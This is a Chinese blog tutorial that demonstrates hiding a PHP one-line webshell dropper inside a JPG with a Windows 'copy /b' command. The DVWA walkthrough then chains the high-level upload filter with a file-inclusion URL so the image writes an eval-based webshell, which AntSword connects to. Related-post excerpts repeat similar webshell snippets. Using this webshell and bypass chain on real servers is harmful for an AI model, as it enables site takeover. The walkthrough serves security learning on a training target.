PHP 图片木马隐写方法及靶机演示

已于 2022-11-11 20:37:41 修改
阅读量3.1k 收藏 28
点赞数 4
分类专栏: 网络安全 文章标签: php 网络安全
于 2022-11-11 20:15:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/byzy1314/article/details/127809844
版权

前言

注:文章仅用于网络安全学习!!!

在上文中我们简单的讲解了一句话木马的相关的内容

上文链接:PHP 一句话木马 @eval($_POST[‘hack‘]); 语句解析及靶机演示

通常,我们还会面临防御者对文件类型、大小进行的过滤。有些规定只能上传图片的还可能对图片进行采集,即使攻击者更改文件类型也会被拦截。

此时,我们就需要一张真正的图片来做掩护,利用隐写术将木马写入图片中,以此来绕过防御。

图片木马

隐写术:

隐写术是一门关于信息隐藏的技巧与科学,所谓信息隐藏指的是不让除预期的接收者之外的任何人知晓信息的传递事件或者信息的内容

隐写目的:以表面正常的数字载体如静止图象、数字音频和视频信号等作为掩护,在其中隐藏秘密信息。额外数据的嵌入既不改变载体信号的视、听觉效果,也不改变计算机文件的大小和格式(包括文件头),使隐蔽信息能以不为人知的方式进行传输

隐写领域用的最多的就是把需要隐写的内容以二进制的形式写入图片中

隐写方法:

首先我们准备一个正常的图片与一个php木马文件

php木马文件代码如下:

<?php fputs(fopen('hack.php','w'),'<?php @eval($_POST[hack]);?>'); ?>

 然后打开cmd终端,执行以下copy命令

copy logo.jpg/b+hack.php/a hack.jpg

其中的/b表示二进制文件,/a表示ASCII码文件

可以看到图中生成的hack.jpg就是生成的图片木马

我们打开该木马图片文件,可以看到木马已经被写入到图片文件的末尾了

靶机演示

我们打开DVWA靶场,选择“高”安全等级,找到文件上传

然后查看源代码

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

发现只允许通过jpg、jpeg、png类型的文件,而且getimagesize()函数还限制了上传文件的文件头必须为图像类型

此时刚好可以用到刚刚做好的图片木马,我们上传该图片,回显出了文件上传地址

然后我们利用DVWA的文件包含漏洞,点开file1.php 

将URL栏中的

?page=file1.php

改为以下指令,访问刚刚上传的hack.jpg

?page=file:///D:\phpStudy\phpstudy_pro\WWW\DVWA\hackable\uploads\hack.jpg

页面回显出以下内容

此时在DVWA文件包含漏洞目录下已经自动生成了hack.php木马文件

我们打开“中国蚁剑”,尝试连接该网站主机

连接成功,成功掌控目标主机

至此,我们结合文件上传漏洞和文件包含漏洞,在只能上传图片的网站主机中植入一句话木马并成功连接掌控目标网站主机

百彦子烨
关注
  • 4
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
防止.JPG类型木码的方法
qq2453939845的博客
04-28 150
木码是大家都讨厌的一种程序,但是在使用电脑的过程中难免会有木码入侵的情况,那么我们要如何防止.JPG类型木码呢? 是不是很多小伙伴们都想知道?那么我们现在就去看看防止.JPG类型木码的方法。 .net木码目前很强的, 此木码是一个.NET程序制作,如果你的服务器支持.NET那就要注意了,,进入木码有个功能叫:IIS Spy ,点击以后可以看到所有站点所在的物理路径。以前有很多人提出过,但一直没有人...
渗透测试新手练习及高手深入挖掘专用Linux及Windows靶机(官方原版镜像)
05-08
本人学习时使用的的这两个系统,常见的高风险漏洞较多,容易利用,适合新手练习。 metasploitable-linux为常用的Linux靶机,系统包含了很多高风险漏洞、弱口令及容易利用的端口、服务,是渗透测试初学者练习技术的不二之选。 Windows_xp_pro_with_sp2就更不用说了,都被人挖烂了,sp2版本相比sp3更简单一些,适合新手练习。
web安全-文件上传漏洞-图片马制作-相关php函数讲解-upload靶场通关详细教学(3)
ran的博客
01-30 5837
getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。的知识,比如我们平时在进行文件上传时,在我们上传文件后,网站会对图片进行二次处理(格式、尺寸、保存、删除要求等),服务器会把面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片(标准化)并放到网站对应的标签进行显示。
javascript原生态xhr上传多个图片,可预览和修改上传图片为固定尺寸比例,防恶意代码,加后端php处理图片
cdcdhj的博客
10-25 689
//前端上传文件 //后端处理图片文件
一句话图片木马
qq_44111753的博客
08-20 1万+
一句话图片木马 一、准备图片木马 1、准备任意图片pho.jpg 2、准备木马文件hack.php <?php @eval($_POST['hack']);?> 3、利用系统命令,将木马复制到图片文件中,产生图片木马hack.jpg copy pho.jpg/b+hack.php/a hack.jpg b二进制格式,a为ASCII 二、上传图片 三、利用文件包含漏洞解析图片木马(没有文件包含漏洞图片木马将无法执行) 1、 右键图片复制图片地址,找到图片木马具体位置(upload//4820
木马制作——图片木马制作
weixin_50339082的博客
06-09 1万+
木马制作——图片木马制作 一、简单说明 图片木马指的是图片格式的文件木马,图片格式包括jpg,png等,原理是将木马程序和图片捆绑在一起,达到伪装的目的,程序可以是脚本语言或者编译语言,在web渗透中,通常将脚本编写的webshell和图片合成一个新的木马,结合web的文件上传漏洞进行利用,获取网站应用的webshell权限。 二、制作方式 利用windows 命令 准备一个木马,以php一句话为例,文件名为pass.php,内容如下: <?php @eval($_POST['pass']); ?
图片木马制作方法详细教程
爱吃仡坨的Blog
10-24 8647
将写的木马插入到图片中,之后配合解析漏洞.htaccess等,对图片马进行解析,从而执行图片中的恶意代码;# 因此 服务器是对文件后缀来对文件进行解析的,所以我们可以通过修改文件后缀来对图片进行访问。此时生成的是图片文件,我们将后缀改为zip时,任然可以读取压缩包文件中的内容。先将一张图片放到PS中,之后点击左上角文件——>文件简介。通过十六进制编辑器,将一句话木马写入图片中。通过图片隐藏信息,是一个合成的过程。最后将带有一句话木马的图片导出。图片越小的文件,制作工艺越纯良。把压缩包放到图片中,进行合成。
PHP木马
qq_41272376的博客
02-16 4208
PHP木马 一句话木马 可以在目标服务器上执行PHP代码,并和客户端(如菜刀,Cknife、冰蝎、蚁剑)进行交互的webshell,俗称小马。 多功能木马 根据PHP语法,编写较多代码,并在服务器上执行,完成所有功能的Webshell,俗称大马 逻辑木马 利用系统逻辑漏洞(如php uaf漏洞),绕过访问控制或执行特殊功能的WebShell PHP 可执行系统命令的函数 system string system ( string $command [, int &$return_var ] );
PHP木马入门指南:绕过WAF轻松入侵
鹅子鱼的博客:很菜但是很好学的小菜鸟
03-24 1021
一句话木马之后,演变一下,绕狗且不是轻轻松松
简单图片木马的生成与利用
Deeeelete的博客
02-08 8758
首先准备一个图片,还有一个脚本,这php文件就采用了最简单的一句话木马,具体内容为<?php @eval($_POST['a']);?>,确保两个文件在同一个路径下。2.紧着着按住shift键,然后点击鼠标右键,这时候就会出现“在此处打开powershell”的字眼,点击 进入蓝色窗口,其实我们想通过这样来进入cmd,所以我们用命令start cmd;进入 3.在cmd中输入 c...
2020最新渗透测试靶机和工具及教程
05-30
搜集的渗透测试的靶场,有Bwapp综合靶场练习 webug综合靶场练习 DVWA综合靶场练习 pikachu靶场练习 uploads文件练习 SQlilabs注入练习 ZVulDirll综合靶场,全部封装在虚拟机中,渗透工具封装在另一虚拟机中。
upload 靶机上传漏洞利用教学(含代码分析).doc
09-16
php 上传漏洞大演练。推荐使用Windows系统搭建,我最先使用docker pull c0ny1/upload-labs的镜像在Pass-03遇到问题,初步判断是该镜像内的php.conf文件配置错误导致。
OWASP靶机、安全学习、测试
05-24
提供的是owasp靶机的下载,下载后直接在虚拟机导入即可使用 OWASP靶机是一个开放式Web应用程序安全项目组织,旨在帮助计算机和互联网应用程序提供公正、实际、有成本效益的信息。在信息安全中OWASP TOP 10 是...
web渗透测试靶机(新手)
05-07
web渗透测试靶机(新手)
php 图片木马,php图片木马实现原理
weixin_27310417的博客
03-09 4296
什么是木马木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码,是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。那,php的木马是长什么样的呢?我们来看下面这段代码:...
php病毒图片后缀名,脚本图片类后门病毒的完美使用方法
weixin_35041472的博客
03-13 351
前两天,看了一篇《脚本注入图片方法》的文章,相信很多人都通过这篇文章了解了如何在图片加入脚本,以及如何在正常的asp(或php)文件中通过include函数使图片中的脚本产生效用。但是,这种方法的问题又随之而来了:有人问道:通常脚本网页文件中如果想要插入一个图片,简简单单的一个html标签就解决了,如果我们用include代替的话,是否太过明显?虽然这种语句放在大型页面中手工查找有点麻烦,但如...
【文件上传绕过】——二次渲染漏洞
热门推荐
weixin_45588247的博客
07-28 1万+
copy a.png /b + a.php /a 1.png: http://www.xue51.com/soft/47175.html =================================================== 1. png图片组成:   png图片由3个以上的数据块组成。   PNG定义了两种类型的数据块,一种是称为关键数据块(critical chunk),这是标准的数据块,另一种叫做辅助数据块(ancillary chunks),这是可选的数据块。   关键数据块定义
文件上传漏洞进阶教程/白名单绕过/图片马制作/图片马执行
ChenD的学习笔记
10-23 6910
文件上传漏洞进阶教程/白名单绕过/图片马制作/图片马执行
php 图片木马,php检测图片木马多进制编程实践
weixin_42355744的博客
03-09 329
前不久,我申请加入了某开源组织,他们要我写一个功能用来检测图片中是否有木马脚本。其实一开始我什么也不知道,只是后来在网上查了一些资料,找到的全是有制作图片木马的教程,并没有找到检测的程序。经过几番思索之后,决定从制作原理来分析这种木马程序。这种木马程序是十六进制编码写的,我灵机一动,写了以下这个上传类。最终通过了组织测验。呵呵现在把它拿出来给大家分享,有什么不好的地方,还请指正! anyon@13...
蚁剑jsp一句话木马
最新发布
11-23
根据提供的引用内容,我们可以了解到蚁剑是一款常用的管理工具,而一句话木马则是黑客攻击中常用的一种方式。下面是蚁剑jsp一句话木马的介绍: 1. 首先,我们需要将jsp一句话木马上传到目标服务器上。可以使用蚁剑连接目标服务器,然后上传jsp一句话木马。 2. 上传成功后,我们可以使用蚁剑连接jsp一句话木马。连接成功后,我们就可以通过蚁剑的图形化界面来执行各种操作,例如查看文件、修改文件、执行命令等等。 需要注意的是,使用一句话木马进行攻击是非法的行为,本回答仅供学习和研究使用,请勿用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值